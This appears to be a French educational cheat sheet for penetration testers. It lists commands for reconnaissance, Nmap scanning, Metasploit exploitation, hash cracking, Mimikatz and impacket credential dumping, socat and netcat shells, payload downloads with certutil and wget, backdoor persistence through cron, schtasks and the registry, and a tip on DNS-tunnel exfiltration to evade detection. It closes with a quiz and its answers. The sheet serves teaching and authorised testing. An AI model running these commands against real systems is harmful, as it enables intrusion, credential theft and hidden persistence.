← Retour au portail

Fiche 8 - Commandes essentielles pour le pentest – Référence rapide

Recueil des commandes indispensables en test d'intrusion : reconnaissance, scanning, exploitation, post-exploitation, maintien d'accès, et transfert de fichiers. Chaque commande est présentée avec sa syntaxe, ses options clés et un exemple d'usage. À usage strictement professionnel et légal.

Avancé — Cybersécurité / Pentest ⏱️ 35 min 📁 Cyber avancée

🎯 Objectifs de la fiche

  1. Avertissement et contexte — Rappel légal et éthique, environnement de test
  2. Reconnaissance passive (OSINT) — Commandes pour recueillir des informations publiques
  3. Scanning réseau et découverte de services — Nmap, masscan, netcat
  4. Analyse de vulnérabilités — Nessus, OpenVAS, nikto, nuclei
  5. Exploitation — Metasploit, sqlmap, hydra, john, hashcat
  6. Post-exploitation — Mimikatz, impacket, bloodhound, powershell
  7. Transfert de fichiers et tunnels — Netcat, socat, ssh, certutil, wget, curl
  8. Maintien d'accès — Cron, schtasks, backdoors
  9. Bonnes pratiques et logs — Conserver des preuves, horodatage, anonymisation
⛔ L'utilisation de ces commandes sur des systèmes dont vous n'êtes pas propriétaire ou sans autorisation écrite explicite est ILLÉGALE et peut être qualifiée de cybercriminalité. Cette fiche est destinée aux professionnels de la sécurité, dans le cadre de tests d'intrusion autorisés, de laboratoires, ou de formations certifiantes. L'auteur décline toute responsabilité en cas d'usage abusif.

1. Reconnaissance passive (OSINT)

CommandeUtilitéExemple
theHarvester -d <domaine> -b <source>Collecte d'emails et sous-domainestheHarvester -d exemple.com -b google,bing
recon-ngFramework modulaire d'OSINTworkspace create cible; marketplace install; modules load
dig <domaine> anyInterrogation DNS complètedig exemple.com any
whois <domaine>Informations WHOISwhois exemple.com
shodan search <query>Recherche sur Shodan (API requise)shodan search 'port:22 country:FR'

2. Scanning réseau et découverte de services

CommandeOptions / DescriptionExemple
nmap -sS -sV -O -T4 <cible>SYN scan, versions, OS, vitesse élevéenmap -sS -sV -O -T4 192.168.1.0/24
nmap -p- -A <cible>Tous les ports (1-65535), détection agressivenmap -p- -A 192.168.1.10
masscan -p1-65535 --rate=10000 <cidr>Scan ultra-rapidemasscan -p1-65535 --rate=10000 192.168.1.0/24
nc -zv <ip> <port>Test de connexion TCP (netcat)nc -zv 192.168.1.10 22
rustscan -a <ip>Scan rapide avec détection de servicesrustscan -a 192.168.1.0/24
💡 Utilisez -sC pour lancer les scripts Nmap par défaut, et --script=vuln pour détecter des vulnérabilités connues.

3. Analyse de vulnérabilités

CommandeUtilitéExemple
nikto -h <url>Scan de vulnérabilités webnikto -h http://192.168.1.100
nuclei -u <url> -t <template>Scan basé sur des templatesnuclei -u http://192.168.1.100 -t cves/
openvas-cliScan via OpenVAS (nécessite setup)omp -u admin -w password -T <target>
nessuscliScan avec Nessus (ligne de commande)nessuscli scan list

4. Exploitation

CommandeDescriptionExemple
msfconsoleLancement du framework Metasploituse exploit/windows/smb/ms17_010_eternalblue ; set RHOSTS <ip> ; exploit
sqlmap -u <url> --dbsInjection SQL automatiséesqlmap -u 'http://target.com/page?id=1' --dbs
hydra -l <user> -P <passfile> ssh://<ip>Attaque par force brute SSHhydra -l root -P rockyou.txt ssh://192.168.1.10
john <hashfile>Cracker de hash (mode wordlist)john --wordlist=rockyou.txt hashes.txt
hashcat -m <mode> <hashfile> <wordlist>Cracker de hash (GPU)hashcat -m 1000 -a 0 hashes.txt rockyou.txt
ℹ️ Les modes hashcat les plus courants : 1000 (NTLM), 1800 (sha512crypt), 0 (MD5).

5. Post-exploitation – Élévation de privilèges et extraction d'informations

CommandeUtilitéExemple
mimikatzExtraction de mots de passe et tickets Kerberosprivilege::debug ; sekurlsa::logonpasswords
impacket-secretsdumpDump des hashes SAM et NTDSimpacket-secretsdump domain/user:pass@<DC>
bloodhoundAnalyse de l'Active Directory pour les chemins d'attaqueLancer l'ingesteur SharpHound puis analyser avec BloodHound
powershell -c <cmd>Exécution PowerShell à distancepowershell -c 'Invoke-Command -ComputerName SRV -ScriptBlock {Get-Service}'
whoami /privVoir les privilèges de l'utilisateur (Windows)whoami /priv
Exemple de dump des hashes avec impacket depuis un shell Metasploit :
meterpreter > load kiwi
meterpreter > creds_all
ou via impacket :
impacket-secretsdump 'DOMAIN/username:password@192.168.1.5'

6. Transfert de fichiers et tunnels

CommandeDescriptionExemple
nc -lvnp <port> < fichierRéception d'un fichier via netcat (côté récepteur)nc -lvnp 4444 > received.exe
nc -nv <ip> <port> < fichierEnvoi d'un fichier (côté émetteur)nc -nv 10.0.0.5 4444 < payload.exe
socat TCP-LISTEN:<port>,reuseaddr,fork EXEC:/bin/shShell reverse via socat (serveur)socat TCP-LISTEN:4444,fork EXEC:/bin/sh
ssh -D <port> user@<host>Tunnel SOCKS5 (proxy dynamique)ssh -D 1080 user@bastion
certutil -urlcache -f <url> <fichier>Téléchargement de fichier (Windows)certutil -urlcache -f http://server/payload.exe payload.exe
wget <url>Téléchargement simple (Linux)wget http://server/script.sh
curl -O <url>Téléchargement avec curlcurl -O http://server/file
💡 Pour exfiltrer des données, utilisez des protocoles chiffrés (SSH, HTTPS) ou du DNS tunneling pour éviter la détection.

7. Maintien d'accès (persistance)

CommandeMéthodeExemple
crontab -e (Linux)Tâche planifiée cronAjouter @reboot /path/to/backdoor
schtasks /create (Windows)Tâche planifiéeschtasks /create /tn Update /tr C:\backdoor.exe /sc onstart /ru SYSTEM
reg add (Windows)Clé de registre pour exécution au démarragereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d C:\backdoor.exe
ssh -R <port>:localhost:<port> user@serverReverse SSH tunnelssh -R 2222:localhost:22 user@remote
ℹ️ La persistance doit être utilisée uniquement pour prouver l'impact et tester les capacités de détection, pas pour un usage malveillant.

8. Bonnes pratiques opérationnelles

Quelle commande Nmap permet de détecter les versions des services ?
  • -sV
  • -O
  • -p-
  • -A

✅ Réponse : -sV

Quel outil est principalement utilisé pour extraire les hashes de mots de passe en mémoire sous Windows ?
  • John the Ripper
  • Mimikatz
  • Hashcat
  • Hydra

✅ Réponse : Mimikatz

Quelle commande permet de télécharger un fichier sous Windows en ligne de commande ?
  • wget
  • curl
  • certutil -urlcache
  • Invoke-WebRequest

✅ Réponse : certutil -urlcache

Quel paramètre de Metasploit définit la cible ?
  • RHOST
  • LHOST
  • RPORT
  • PAYLOAD

✅ Réponse : RHOST

Quelle commande permet d'établir un tunnel SOCKS5 via SSH ?
  • ssh -L
  • ssh -R
  • ssh -D
  • ssh -N

✅ Réponse : ssh -D

Quel outil est spécialisé dans l'attaque par force brute sur des protocoles comme SSH ou HTTP ?
  • Nmap
  • Hydra
  • Metasploit
  • John

✅ Réponse : Hydra

Que signifie l'option '-p-' dans Nmap ?
  • Ping uniquement
  • Scanne tous les ports TCP (1-65535)
  • Utilise un scan SYN
  • Désactive la résolution DNS

✅ Réponse : Scanne tous les ports TCP (1-65535)

Quelle commande permet de lancer un reverse shell avec netcat côté attaquant ?
  • nc -lvnp 4444
  • nc -e /bin/sh 10.0.0.1 4444
  • nc -nv 10.0.0.1 4444
  • nc -l 4444

✅ Réponse : nc -lvnp 4444

Quel outil est utilisé pour analyser les chemins d'attaque dans Active Directory ?
  • BloodHound
  • Impacket
  • Nessus
  • Nuclei

✅ Réponse : BloodHound

Laquelle de ces commandes est utilisée pour cracker des hashs MD5 avec wordlist en utilisant hashcat ?
  • hashcat -m 0 -a 0 hash.txt wordlist.txt
  • hashcat -m 100 -a 3 hash.txt
  • hashcat -m 1800 -a 0 hash.txt
  • hashcat -m 0 -a 1 hash.txt

✅ Réponse : hashcat -m 0 -a 0 hash.txt wordlist.txt

🎯 Passer l'évaluation de cette fiche